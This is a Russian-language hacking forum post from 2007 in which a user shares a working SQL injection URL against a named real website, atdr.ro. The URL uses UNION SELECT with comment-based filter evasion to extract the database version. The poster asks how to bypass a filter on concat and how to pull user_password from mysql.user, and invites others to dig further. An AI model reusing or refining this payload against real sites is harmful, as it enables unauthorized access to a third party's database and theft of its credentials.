
14.11.2007, 10:49
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме: 500695
Репутация:
524
|
|
Вопрос!
Сайт atdr.ro :
Код:
http://atdr.ro/index.php?id=-1/**/union/**/select/**/1,2,version(),4,5,6,7,8,9,10,11/*
Фильтрацию " +" обошёл, а вот concat никак не могу
Как обойти?
И ещё: при подборе таблиц странная реакция на запрос поля user_password из mysql.user
Кто копнёт глубже - отпишитесь (+)!
|
|
|